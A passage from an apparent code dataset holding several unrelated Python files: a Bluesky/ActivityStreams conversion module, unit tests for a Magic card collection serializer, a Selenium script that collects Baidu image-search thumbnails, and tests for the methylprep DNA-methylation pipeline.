'did:web:foo.bar.com'\n\n https://atproto.com/specs/did\n\n Args:\n url: str\n\n Returns: str\n \"\"\"\n parsed = urllib.parse.urlparse(url)\n if not parsed.hostname:\n raise ValueError(f'Invalid URL: {url}')\n if parsed.netloc != parsed.hostname:\n logger.warning(f\"URL {url} contained a port, which will not be included in the DID.\")\n if parsed.path and parsed.path != \"/\":\n logger.warning(f\"URL {url} contained a path, which will not be included in the DID.\")\n\n return f'did:web:{parsed.hostname}'\n\n\ndef did_web_to_url(did):\n \"\"\"Converts a did:web to a URL.\n\n In AT Proto, only hostname-based web DIDs are supported.\n Paths are not supported, and will throw an invalid error.\n\n Examples:\n * 'did:web:foo.com' => 'https://foo.com'\n * 'did:web:foo.com%3A3000' => INVALID\n * 'did:web:bar.com:baz:baj' => INVALID\n\n https://atproto.com/specs/did\n\n Args:\n did: str\n\n Returns: str\n \"\"\"\n if not did or not DID_WEB_PATTERN.match(did):\n raise ValueError(f'Invalid did:web: {did}')\n\n host = did.removeprefix('did:web:')\n\n host = urllib.parse.unquote(host)\n return f'https://{host}/'\n\n\ndef at_uri_to_web_url(uri, handle=None):\n \"\"\"Converts an at:// URI to a https://bsky.app URL.\n\n Args:\n uri: str, at:// URI\n handle: str, optional user handle. If not provided, defaults to the DID in uri.\n\n Returns:\n str, https://bsky.app URL\n \"\"\"\n if not uri:\n return None\n\n if not uri.startswith('at://'):\n raise ValueError(f'Expected at:// URI, got {uri}')\n\n parsed = urllib.parse.urlparse(uri)\n did = parsed.netloc\n collection, tid = parsed.path.strip('/').split('/')\n\n type = COLLECTIONS.get(collection)\n if not type:\n return None\n\n return f'{Bluesky.user_url(handle or did)}/{type}/{tid}'\n\n\ndef from_as1(obj, from_url=None):\n \"\"\"Converts an AS1 object to a Bluesky object.\n\n The objectType field is required.\n\n Args:\n obj: dict, AS1 object or activity\n from_url: str, optional URL the original object was fetched from.\n Currently unused. 
TODO: remove?\n\n Returns: dict, app.bsky.* object\n\n Raises:\n ValueError\n if the objectType or verb fields are missing or unsupported\n \"\"\"\n activity = obj\n verb = activity.get('verb') or 'post'\n inner_obj = as1.get_object(activity)\n if inner_obj and verb == 'post':\n obj = inner_obj\n\n type = obj.get('objectType') or 'note'\n actor = as1.get_object(activity, 'actor')\n\n # TODO: once we're on Python 3.10, switch this to a match statement!\n if type == 'person':\n # banner is featured image, if available\n banner = None\n for img in util.get_list(obj, 'image'):\n url = img.get('url')\n if img.get('objectType') == 'featured' and url:\n banner = url\n break\n\n url = as1.get_url(obj)\n id = obj.get('id')\n if not url and id:\n parsed = util.parse_tag_uri(id)\n if parsed:\n # This is only really formatted as a URL to keep url_to_did_web happy.\n url = f'https://{parsed[0]}'\n try:\n did_web = url_to_did_web(url)\n except ValueError as e:\n logger.info(f\"Couldn't generate did:web: {e}\")\n did_web = ''\n\n # handles must be hostnames\n # https://atproto.com/specs/handle\n username = obj.get('username')\n parsed = urllib.parse.urlparse(url)\n domain = parsed.netloc\n if username and HANDLE_PATTERN.match(username):\n handle = username\n elif url:\n handle = domain\n else:\n handle = ''\n\n ret = {\n '$type': 'app.bsky.actor.defs#profileView',\n 'displayName': obj.get('displayName'),\n 'description': obj.get('summary'),\n 'avatar': util.get_url(obj, 'image'),\n 'banner': banner,\n 'did': id if id and id.startswith('did:') else did_web,\n # this is a DID\n # atproto/packages/pds/src/api/app/bsky/actor/getProfile.ts#38\n # TODO: should be more specific than domain, many users will be on shared\n # domains\n 'handle': handle,\n }\n\n elif verb == 'share':\n ret = from_as1(inner_obj)\n ret['reason'] = {\n '$type': 'app.bsky.feed.defs#reasonRepost',\n 'by': from_as1(actor),\n 'indexedAt': util.now().isoformat(),\n }\n\n elif verb == 'follow':\n if not actor or not inner_obj:\n raise ValueError('follow activity requires actor and object')\n ret = {\n '$type': 'app.bsky.graph.follow',\n 'subject': actor.get('id') or actor.get('url'),\n 'createdAt': obj.get('published', ''),\n }\n\n elif verb == 'post' and type in ('article', 'comment', 'link', 'mention', 'note'):\n # convert text to HTML and truncate\n src = Bluesky('unused')\n content = obj.get('content')\n text = obj.get('summary') or content or obj.get('name') or ''\n text = src.truncate(text, None, OMIT_LINK)\n\n facets = []\n if text == content:\n # convert index-based to facets\n for tag in util.get_list(obj, 'tags'):\n facet = {\n '$type': 'app.bsky.richtext.facet',\n }\n\n url = tag.get('url')\n type = tag.get('objectType')\n if type == 'mention':\n facet['features'] = [{\n '$type': 'app.bsky.richtext.facet#mention',\n 'did': (url.removeprefix(f'{Bluesky.BASE_URL}/profile/')\n if url.startswith(f'{Bluesky.BASE_URL}/profile/did:')\n else ''),\n }]\n elif type in ('article', 'link', 'note') or url:\n facet['features'] = [{\n '$type': 'app.bsky.richtext.facet#link',\n 'uri': url,\n }]\n\n try:\n start = int(tag['startIndex'])\n if start and obj.get('content_is_html'):\n raise NotImplementedError('HTML content is not supported with index tags')\n end = start + int(tag['length'])\n\n facet['index'] = {\n # convert indices from Unicode chars (code points) to UTF-8 encoded bytes\n # https://github.com/snarfed/atproto/blob/5b0c2d7dd533711c17202cd61c0e101ef3a81971/lexicons/app/bsky/richtext/facet.json#L34\n 'byteStart': 
len(content[:start].encode()),\n 'byteEnd': len(content[:end].encode()),\n }\n except (KeyError, ValueError, IndexError, TypeError):\n pass\n\n facets.append(facet)\n\n # images\n images_embed = images_record_embed = None\n images = util.get_list(obj, 'image')\n\n if images:\n images_embed = {\n '$type': 'app.bsky.embed.images#view',\n 'images': [{\n '$type': 'app.bsky.embed.images#viewImage',\n 'thumb': img.get('url'),\n 'fullsize': img.get('url'),\n 'alt': img.get('displayName') or '',\n } for img in images[:4]],\n }\n images_record_embed = {\n '$type': 'app.bsky.embed.images',\n 'images': [{\n '$type': 'app.bsky.embed.images#image',\n 'image': 'TODO', # this is a $type: blob\n 'alt': img.get('displayName') or '',\n } for img in images[:4]],\n }\n\n # article/note attachments\n record_embed = record_record_embed = external_embed = external_record_embed = None\n\n for att in util.get_list(obj, 'attachments'):\n if not att.get('objectType') in ('article', 'link', 'note'):\n continue\n\n id = att.get('id') or ''\n url = att.get('url') or ''\n if (id.startswith('at://') or id.startswith(Bluesky.BASE_URL) or\n url.startswith('at://') or url.startswith(Bluesky.BASE_URL)):\n # quoted Bluesky post\n embed = from_as1(att).get('post')\n embed['value'] = embed.pop('record', None)\n record_embed = {\n '$type': f'app.bsky.embed.record#view',\n 'record': {\n **embed,\n '$type': f'app.bsky.embed.record#viewRecord',\n # override these so that trim_nulls below will remove them\n 'downvoteCount': None,\n 'replyCount': None,\n 'repostCount': None,\n 'upvoteCount': None,\n },\n }\n record_record_embed = {\n '$type': f'app.bsky.embed.record',\n 'record': {\n 'cid': 'TODO',\n 'uri': id or url,\n }\n }\n else:\n # external link\n external_record_embed = {\n '$type': f'app.bsky.embed.external',\n 'external': {\n '$type': f'app.bsky.embed.external#external',\n 'uri': url or id,\n 'title': att.get('displayName'),\n 'description': att.get('summary') or att.get('content') or '',\n }\n }\n external_embed = {\n '$type': f'app.bsky.embed.external#view',\n 'external': {\n **external_record_embed['external'],\n '$type': f'app.bsky.embed.external#viewExternal',\n 'thumb': util.get_first(att, 'image'),\n },\n }\n\n if record_embed and (images_embed or external_embed):\n embed = {\n '$type': 'app.bsky.embed.recordWithMedia#view',\n 'record': record_embed,\n 'media': images_embed or external_embed,\n }\n record_embed = {\n '$type': 'app.bsky.embed.recordWithMedia',\n 'record': record_record_embed,\n 'media' : images_record_embed or external_record_embed,\n }\n else:\n embed = record_embed or images_embed or external_embed\n record_embed = record_record_embed or images_record_embed or external_record_embed\n\n # in reply to\n reply = None\n in_reply_to = as1.get_object(obj, 'inReplyTo')\n if in_reply_to:\n reply = {\n '$type': 'app.bsky.feed.post#replyRef',\n 'root': {\n '$type': 'com.atproto.repo.strongRef',\n 'uri': '', # TODO?\n 'cid': 'TODO',\n },\n 'parent': {\n '$type': 'com.atproto.repo.strongRef',\n 'uri': in_reply_to.get('id') or in_reply_to.get('url'),\n 'cid': 'TODO',\n },\n }\n\n # author\n author = as1.get_object(obj, 'author')\n if author:\n author = {\n **from_as1(author),\n '$type': 'app.bsky.actor.defs#profileViewBasic',\n }\n\n ret = {\n '$type': 'app.bsky.feed.defs#feedViewPost',\n 'post': {\n '$type': 'app.bsky.feed.defs#postView',\n 'uri': obj.get('id') or obj.get('url') or '',\n 'cid': 'TODO',\n 'record': {\n '$type': 'app.bsky.feed.post',\n 'text': text,\n 'createdAt': obj.get('published', ''),\n 
'embed': record_embed,\n 'facets': facets,\n 'reply': reply\n },\n 'author': author,\n 'embed': embed,\n 'replyCount': 0,\n 'repostCount': 0,\n 'upvoteCount': 0,\n 'downvoteCount': 0,\n 'indexedAt': util.now().isoformat(),\n },\n }\n\n else:\n raise ValueError(f'AS1 object has unknown objectType {type} or verb {verb}')\n\n # keep some fields that are required by lexicons\n return util.trim_nulls(ret, ignore=(\n 'alt',\n 'createdAt',\n 'description',\n 'did',\n 'handle',\n 'root',\n 'text',\n 'uri',\n 'viewer',\n ))\n\n\ndef as1_to_profile(actor):\n \"\"\"Converts an AS1 actor to a Bluesky `app.bsky.actor.profile`.\n\n Args:\n actor: dict, AS1 actor\n\n Raises:\n ValueError: if `actor['objectType']` is not in :attr:`as1.ACTOR_TYPES`\n \"\"\"\n type = actor.get('objectType')\n if type not in as1.ACTOR_TYPES:\n raise ValueError(f'Expected actor type, got {type}')\n\n profile = from_as1(actor)\n assert profile['$type'] == 'app.bsky.actor.defs#profileView'\n profile['$type'] = 'app.bsky.actor.profile'\n\n for field in 'did', 'handle', 'indexedAt', 'labels', 'viewer':\n profile.pop(field, None)\n\n return profile\n\n\ndef to_as1(obj, type=None):\n \"\"\"Converts a Bluesky object to an AS1 object.\n\n The $type field is required.\n\n Args:\n profile: dict, app.bsky.* object\n type: str, optional $type to parse with, only used if obj['$type'] is unset\n\n Returns: dict, AS1 object\n\n Raises:\n ValueError if the $type field is missing or unsupported\n \"\"\"\n if not obj:\n return {}\n\n type = obj.get('$type') or type\n if not type:\n raise ValueError('Bluesky object missing $type field')\n\n # TODO: once we're on Python 3.10, switch this to a match statement!\n if type in ('app.bsky.actor.defs#profileView',\n 'app.bsky.actor.defs#profileViewBasic'):\n images = [{'url': obj.get('avatar')}]\n banner = obj.get('banner')\n if banner:\n images.append({'url': obj.get('banner'), 'objectType': 'featured'})\n\n handle = obj.get('handle')\n did = obj.get('did')\n\n ret = {\n 'objectType': 'person',\n 'id': did,\n 'url': (Bluesky.user_url(handle) if handle\n else did_web_to_url(did) if did and did.startswith('did:web:')\n else None),\n 'displayName': obj.get('displayName'),\n 'summary': obj.get('description'),\n 'image': images,\n }\n\n elif type == 'app.bsky.feed.post':\n text = obj.get('text', '')\n\n # convert facets to tags\n tags = []\n for facet in obj.get('facets', []):\n tag = {}\n\n for feat in facet.get('features', []):\n if feat.get('$type') == 'app.bsky.richtext.facet#link':\n tag.update({\n 'objectType': 'article',\n 'url': feat.get('uri'),\n })\n elif feat.get('$type') == 'app.bsky.richtext.facet#mention':\n tag.update({\n 'objectType': 'mention',\n 'url': Bluesky.user_url(feat.get('did')),\n })\n\n index = facet.get('index', {})\n # convert indices from UTF-8 encoded bytes to Unicode chars (code points)\n # https://github.com/snarfed/atproto/blob/5b0c2d7dd533711c17202cd61c0e101ef3a81971/lexicons/app/bsky/richtext/facet.json#L34\n byte_start = index.get('byteStart')\n if byte_start is not None:\n tag['startIndex'] = len(text.encode()[:byte_start].decode())\n byte_end = index.get('byteEnd')\n if byte_end is not None:\n tag['displayName'] = text.encode()[byte_start:byte_end].decode()\n tag['length'] = len(tag['displayName'])\n\n tags.append(tag)\n\n in_reply_to = obj.get('reply', {}).get('parent', {}).get('uri')\n\n ret = {\n 'objectType': 'comment' if in_reply_to else 'note',\n 'content': text,\n 'inReplyTo': [{\n 'id': in_reply_to,\n 'url': at_uri_to_web_url(in_reply_to),\n }],\n 'published': 
obj.get('createdAt', ''),\n 'tags': tags,\n }\n\n elif type in ('app.bsky.feed.defs#postView', 'app.bsky.embed.record#viewRecord'):\n ret = to_as1(obj.get('record') or obj.get('value'))\n author = obj.get('author') or {}\n uri = obj.get('uri')\n ret.update({\n 'id': uri,\n 'url': (at_uri_to_web_url(uri, handle=author.get('handle'))\n if uri.startswith('at://') else None),\n 'author': to_as1(author, type='app.bsky.actor.defs#profileViewBasic'),\n })\n\n # convert embeds to attachments\n for embed in util.get_list(obj, 'embeds') + util.get_list(obj, 'embed'):\n embed_type = embed.get('$type')\n\n if embed_type == 'app.bsky.embed.images#view':\n ret.setdefault('image', []).extend(to_as1(embed))\n\n elif embed_type in ('app.bsky.embed.external#view',\n 'app.bsky.embed.record#view'):\n ret.setdefault('attachments', []).append(to_as1(embed))\n\n elif embed_type == 'app.bsky.embed.recordWithMedia#view':\n ret.setdefault('attachments', []).append(to_as1(\n embed.get('record', {}).get('record')))\n media = embed.get('media')\n media_type = media.get('$type')\n if media_type == 'app.bsky.embed.external#view':\n ret.setdefault('attachments', []).append(to_as1(media))\n elif media_type == 'app.bsky.embed.images#view':\n ret.setdefault('image', []).extend(to_as1(media))\n else:\n assert False, f'Unknown embed media type: {media_type}'\n\n elif type == 'app.bsky.embed.images#view':\n ret = [{\n 'url': img.get('fullsize'),\n 'displayName': img.get('alt'),\n } for img in obj.get('images', [])]\n\n elif type == 'app.bsky.embed.external#view':\n ret = to_as1(obj.get('external'), type='app.bsky.embed.external#viewExternal')\n\n elif type == 'app.bsky.embed.external#viewExternal':\n ret = {\n 'objectType': 'link',\n 'url': obj.get('uri'),\n 'displayName': obj.get('title'),\n 'summary': obj.get('description'),\n 'image': obj.get('thumb'),\n }\n\n elif type == 'app.bsky.embed.record#view':\n record = obj.get('record')\n return to_as1(record) if record else None\n\n elif type == 'app.bsky.embed.record#viewNotFound':\n return None\n\n elif type in ('app.bsky.embed.record#viewNotFound',\n 'app.bsky.embed.record#viewBlocked'):\n return None\n\n elif type == 'app.bsky.feed.defs#feedViewPost':\n ret = to_as1(obj.get('post'), type='app.bsky.feed.defs#postView')\n reason = obj.get('reason')\n if reason and reason.get('$type') == 'app.bsky.feed.defs#reasonRepost':\n ret = {\n 'objectType': 'activity',\n 'verb': 'share',\n 'object': ret,\n 'actor': to_as1(reason.get('by'), type='app.bsky.actor.defs#profileViewBasic'),\n }\n\n elif type == 'app.bsky.graph.follow':\n ret = {\n 'objectType': 'activity',\n 'verb': 'follow',\n 'actor': {\n 'url': obj.get('subject'),\n },\n }\n\n elif type == 'app.bsky.feed.defs#threadViewPost':\n return to_as1(obj.get('post'), type='app.bsky.feed.defs#postView')\n\n elif type == 'app.bsky.feed.defs#generatorView':\n uri = obj.get('uri')\n ret = {\n 'objectType': 'service',\n 'id': uri,\n 'url': at_uri_to_web_url(uri),\n 'displayName': f'Feed: {obj.get(\"displayName\")}',\n 'summary': obj.get('description'),\n 'image': obj.get('avatar'),\n 'author': to_as1(obj.get('creator'), type='app.bsky.actor.defs#profileView'),\n }\n\n else:\n raise ValueError(f'Bluesky object has unknown $type: {type}')\n\n return util.trim_nulls(ret)\n\n\nclass Bluesky(Source):\n \"\"\"Bluesky source class. 
See file docstring and Source class for details.\n\n Attributes:\n handle: str\n did: str\n access_token: str\n \"\"\"\n\n DOMAIN = 'bsky.app'\n BASE_URL = 'https://bsky.app'\n NAME = 'Bluesky'\n TRUNCATE_TEXT_LENGTH = 300 # TODO: load from feed.post lexicon\n\n def __init__(self, handle, did=None, access_token=None, app_password=None):\n \"\"\"Constructor.\n\n Either access_token or app_password may be provided, optionally, but not both.\n\n Args:\n handle: str username, eg 'snarfed.bsky.social' or 'snarfed.org'\n did: str, did:plc or did:web, optional\n access_token: str, optional\n app_password: str, optional\n \"\"\"\n assert not (access_token and app_password)\n\n _maybe_load_lexicons()\n\n if app_password:\n client = Client('https://bsky.social', LEXICONS)\n resp = client.com.atproto.server.createSession({\n 'identifier': handle,\n 'password': app_password,\n })\n self.handle = resp['handle']\n self.did = resp['did']\n self.access_token = resp['accessJwt']\n assert self.access_token\n else:\n self.handle = handle\n self.access_token = access_token\n self.did = did\n\n headers = None\n if self.access_token:\n headers = {\n 'Authorization': f'Bearer {self.access_token}',\n }\n self.client = Client('https://bsky.social', LEXICONS, headers=headers)\n\n @classmethod\n def user_url(cls, handle):\n \"\"\"Returns the profile URL for a given handle.\n\n Args:\n handle: str\n\n Returns:\n str, profile URL\n \"\"\"\n return f'{cls.BASE_URL}/profile/{handle.lstrip(\"@\")}'\n\n @classmethod\n def post_url(cls, handle, tid):\n \"\"\"Returns the post URL for a given handle and tid.\n\n Args:\n handle: str\n tid: str\n\n Returns:\n str, profile URL\n \"\"\"\n return f'{cls.user_url(handle)}/post/{tid}'\n\n def get_activities_response(self, user_id=None, group_id=None, app_id=None,\n activity_id=None, fetch_replies=False,\n fetch_likes=False, fetch_shares=False,\n include_shares=True, fetch_events=False,\n fetch_mentions=False, search_query=None,\n start_index=None, count=None, cache=None, **kwargs):\n \"\"\"Fetches posts and converts them to AS1 activities.\n\n See :meth:`Source.get_activities_response` for more information.\n\n Bluesky-specific details:\n\n Args:\n * activity_id: str, an at:// URI\n \"\"\"\n assert not start_index\n\n params = {}\n if count is not None:\n params['limit'] = count\n\n posts = None\n\n if activity_id:\n if not activity_id.startswith('at://'):\n raise ValueError(f'Expected activity_id to be at:// URI; got {activity_id}')\n resp = self.client.app.bsky.feed.getPostThread({}, uri=activity_id, depth=1)\n posts = [resp.get('thread', {})]\n\n elif group_id in (None, FRIENDS):\n resp = self.client.app.bsky.feed.getTimeline({}, **params)\n posts = resp.get('feed', [])\n\n else: # eg group_id SELF\n handle = user_id or self.handle or self.did\n if not handle:\n raise ValueError('user_id is required')\n resp = self.client.app.bsky.feed.getAuthorFeed({}, actor=handle, **params)\n posts = resp.get('feed', [])\n\n # TODO: inReplyTo\n ret = self.make_activities_base_response(\n util.trim_nulls(to_as1(post, type='app.bsky.feed.defs#feedViewPost'))\n for post in posts\n )\n ret['actor'] = {\n 'id': self.did,\n 'displayName': self.handle,\n 'url': self.user_url(self.handle),\n }\n return ret\n","sub_path":"granary/bluesky.py","file_name":"bluesky.py","file_ext":"py","file_size_in_byte":23083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"208465634","text":"\"\"\"Tests for mtg_ssm.serialization.interface.py\"\"\"\n\nimport 
unittest\n\nfrom mtg_ssm.mtg import collection\nfrom mtg_ssm.mtg import models\nfrom mtg_ssm.serialization import interface\n\nfrom tests.mtgjson import mtgjson_testcase\n\n\nclass StubSerializer(interface.MtgSsmSerializer):\n \"\"\"Stub serializer for testing purposes.\"\"\"\n\n format = None\n extension = None\n write_to_file = None\n read_from_file = None\n\n\nclass SubclassRegistrationTest(unittest.TestCase):\n\n def test_all_formats(self):\n all_formats = interface.MtgSsmSerializer.all_formats()\n expected = ['auto', 'csv', 'xlsx', 'deckbox']\n self.assertCountEqual(expected, all_formats)\n self.assertEqual('auto', expected[0])\n\n def test_auto_csv(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n '.csv', 'auto')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgCsvSerializer', serializer_class.__name__)\n\n def test_manual_csv(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n None, 'csv')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgCsvSerializer', serializer_class.__name__)\n\n def test_auto_xlsx(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n '.xlsx', 'auto')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgXlsxSerializer', serializer_class.__name__)\n\n def test_manual_xlsx(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n None, 'xlsx')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgXlsxSerializer', serializer_class.__name__)\n\n def test_unknown_auto(self):\n with self.assertRaises(interface.InvalidExtensionOrFormat):\n interface.MtgSsmSerializer.by_extension_and_format('', 'auto')\n\n def test_unknown_format(self):\n with self.assertRaises(interface.InvalidExtensionOrFormat):\n interface.MtgSsmSerializer.by_extension_and_format(None, 'foo')\n\n\nclass LoadCountsTest(mtgjson_testcase.MtgJsonTestCase):\n\n def setUp(self):\n super().setUp()\n self.collection = collection.Collection(self.mtg_data)\n self.print_id = '958ae1416f8f6287115ccd7c5c61f2415a313546'\n self.printing = self.collection.id_to_printing[self.print_id]\n self.serializer = StubSerializer(self.collection)\n\n def test_coerce_counts(self):\n counts = {'id': 'a', 'multiverseid': '12', 'copies': '4', 'foils': '5'}\n coerced_counts = interface.coerce_counts(counts)\n expected = {'id': 'a', 'multiverseid': 12, 'copies': 4, 'foils': 5}\n self.assertEqual(expected, coerced_counts)\n\n def test_printing_not_found(self):\n counts = {}\n with self.assertRaises(interface.DeserializationError):\n self.serializer.load_counts(counts)\n\n def test_load_nothing(self):\n counts = {'id': self.print_id}\n self.serializer.load_counts(counts)\n self.assertFalse(self.printing.counts)\n\n def test_load_zeros(self):\n counts = {'id': self.print_id, 'copies': 0, 'foils': 0}\n self.serializer.load_counts(counts)\n self.assertFalse(self.printing.counts)\n\n def test_load_counts(self):\n counts = {'id': self.print_id, 'copies': 1, 'foils': 2}\n self.serializer.load_counts(counts)\n expected = {\n models.CountTypes.copies: 1,\n models.CountTypes.foils: 2,\n }\n self.assertEqual(expected, self.printing.counts)\n\n def test_load_with_find(self):\n counts = {'set': 'S00', 'name': 'Rhox', 'copies': 1}\n self.serializer.load_counts(counts)\n printing = self.collection.id_to_printing[\n '536d407161fa03eddee7da0e823c2042a8fa0262']\n self.assertEqual({models.CountTypes.copies: 1}, printing.counts)\n\n def 
test_increase_counts(self):\n self.printing.counts[models.CountTypes.copies] = 1\n self.printing.counts[models.CountTypes.foils] = 2\n counts = {'id': self.print_id, 'copies': 4, 'foils': '8'}\n self.serializer.load_counts(counts)\n expected = {\n models.CountTypes.copies: 5,\n models.CountTypes.foils: 10,\n }\n self.assertEqual(expected, self.printing.counts)\n\n\nclass FindPrintingTest(mtgjson_testcase.MtgJsonTestCase):\n\n def setUp(self):\n super().setUp()\n self.collection = collection.Collection(self.mtg_data)\n\n def test_not_found(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='foo', name='bar', set_number='baz',\n multiverseid='quux')\n # Verify\n self.assertIsNone(printing)\n\n def test_set_and_name(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='S00', name='Rhox', set_number='foo',\n multiverseid='bar')\n # Verify\n self.assertEqual(\n '536d407161fa03eddee7da0e823c2042a8fa0262', printing.id_)\n\n def test_set_and_name_dupes(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ICE', name='Forest',\n set_number=None, multiverseid=None)\n # Verify\n self.assertIsNone(printing)\n\n def test_set_name_num(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='pMGD', name=\"Black Sun's Zenith\",\n set_number='7', multiverseid='foo')\n # Verify\n self.assertEqual(\n '6c9ffa9ffd2cf7e6f85c6be1713ee0c546b9f8fc', printing.id_)\n\n def test_set_name_mv(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='LEA', name='Forest',\n set_number='foo', multiverseid=288)\n # Verify\n self.assertEqual(\n '5ede9781b0c5d157c28a15c3153a455d7d6180fa', printing.id_)\n\n def test_get_set_name_num_mv(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ISD', name='Abattoir Ghoul',\n set_number='85', multiverseid=222911)\n # Verify\n self.assertEqual(\n '958ae1416f8f6287115ccd7c5c61f2415a313546', printing.id_)\n\n def test_bad_set_code(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='foo', name='Abattoir Ghoul',\n set_number='85', multiverseid=222911)\n # Verify\n self.assertIsNone(printing)\n\n def test_bad_name(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ISD', name='foo', set_number='85',\n multiverseid=222911)\n # Verify\n self.assertIsNone(printing)\n","sub_path":"tests/serialization/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"323666041","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\nurl = \"https://www.baidu.com\"\nname = \"二次元图片\"\nname_class = \"图片\"\ndriver = webdriver.Firefox()\ndriver.maximize_window()\ndriver.get(url)\ntime.sleep(2)\n\ndriver.find_element_by_css_selector(\"div.head_wrapper\").find_element_by_id(\"kw\").send_keys(name)\ndriver.find_element_by_css_selector(\"div.head_wrapper\").find_element_by_id(\"su\").click()\ntime.sleep(1)\ndriver.find_element_by_id(\"wrapper\").find_element_by_link_text(name_class).click()\n\nt = True\ni = 0\nwhile t:\n js = \"window.scrollTo(0, document.body.scrollHeight)\"\n driver.execute_script(js)\n\n c = driver.find_elements_by_class_name('imgitem')\n try:\n 
driver.find_element_by_id(\"pageMoreWrap\").find_element_by_id(\"resultInfo\").click()\n t = False\n except:\n i +=1\n print(i)\nprint(\"数量: \", len(c))\nfor i in c:\n et = i.get_attribute('data-thumburl')\n print(et)\n\n# page = driver.page_source # 页面源\n# print(page.replace(u'\\xbb', u' '))","sub_path":"python/jupyter/jupyter/爬虫查看/爬虫代码练习5.py","file_name":"爬虫代码练习5.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"42168888","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n# App\nfrom methylprep.processing import pipeline\nfrom methylprep.utils.files import download_file\n#patching\ntry:\n # python 3.4+ should use builtin unittest.mock not mock package\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass TestPipeline():\n\n @staticmethod\n def test_run_pipeline_all():\n \"\"\" check that we get back useful data.\n check that output files exist, then remove them.\"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n test_outputs = [\n Path(test_data_dir, 'control_probes.pkl'),\n Path(test_data_dir, 'beta_values.pkl'),\n Path(test_data_dir, 'm_values.pkl'),\n Path(test_data_dir, 'meth_values.pkl'),\n Path(test_data_dir, 'unmeth_values.pkl'),\n Path(test_data_dir, 'noob_meth_values.pkl'),\n Path(test_data_dir, 'noob_unmeth_values.pkl'),\n Path(test_data_dir, 'sample_sheet_meta_data.pkl'),\n Path(test_data_dir, '9247377085', '9247377085_R04C02_processed.csv'),\n Path(test_data_dir, '9247377093', '9247377093_R02C01_processed.csv'),\n ]\n for outfile in test_outputs:\n if outfile.exists():\n outfile.unlink()\n\n beta_df = pipeline.run_pipeline(test_data_dir, export=True, save_uncorrected=True, save_control=True, betas=True, m_value=True, batch_size=None)\n for outfile in test_outputs:\n if not outfile.exists():\n raise FileNotFoundError(f\"Expected {outfile.name} to be generated by run_pipeline() but it was missing.\")\n else:\n print('+', outfile)\n outfile.unlink()\n\n @staticmethod\n def test_run_pipeline_demo_containers():\n \"\"\" check that we get back useful data.\n check that output files exist, then remove them.\"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n test_data_containers = pipeline.run_pipeline(test_data_dir)\n print('containers:', test_data_containers)\n\n # spot checking the output.\n #if not test_data_containers[1].unmethylated.data_frame.iloc[0]['mean_value'] == 2712:\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['m_value'], -1.1347262):\n raise AssertionError()\n #if not np.isclose(test_data_containers[1].unmethylated.data_frame.iloc[0]['noob'], 4479.96501260212):\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['noob_unmeth'], 4480.919922):\n raise AssertionError()\n\n @staticmethod\n def test_run_pipeline_with_create_sample_sheet():\n test_data_dir = 'docs/example_data/epic_plus'\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=False, sample_name=['Sample_1'],\n meta_data_frame=False, make_sample_sheet=True)\n # spot checking the output.\n if not np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['noob_meth'], 1180.22998046875):\n print(test_data_containers[0]._SampleDataContainer__data_frame)\n raise AssertionError(f\"{test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['noob_meth']} vs {1180.2299}\")\n if not 
np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['beta_value'], 0.759056):\n raise AssertionError()\n\n @staticmethod\n def test_download_manifest_dummy_file():\n \"\"\" will download a tiny file from the array-manifest-files s3 bucket, to test the SSL connection on all platforms.\n The dummy file is not a proper manifest CSV, so doesn't test format.\n download_file now defaults to non-SSL if SSL fails, with warning to user.\"\"\"\n test_filename = 'unittest.txt'\n test_s3_bucket = 'https://array-manifest-files.s3.amazonaws.com' # 's3://array-manifest-files'\n dest_dir = 'tests'\n # use the .download_file() method in files.py to test the download step specifically. this is called by Manifests() class.\n download_file(test_filename, test_s3_bucket, dest_dir, overwrite=False)\n # in testing mode, this should not exist, and should get deleted right after each successful test.\n if not Path(dest_dir,test_filename).is_file():\n raise AssertionError()\n Path(dest_dir,test_filename).unlink() # deletes file.\n\n @staticmethod\n def test_pipeline_two_samples():\n \"\"\" pass in --sample_name with 2 samples -- from fake command line args \"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n testargs = [\"__program__\", '-d', test_data_dir, '--no_export', '--sample_name', 'AdultLiver1', 'FetalLiver1']\n with patch.object(sys, 'argv', testargs):\n test_data_containers = pipeline.run_pipeline(test_data_dir)\n # spot checking the output.\n #if not test_data_containers[1].unmethylated.data_frame.iloc[0]['mean_value'] == 2712:\n #if not test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['unmeth'] == 2712:\n # 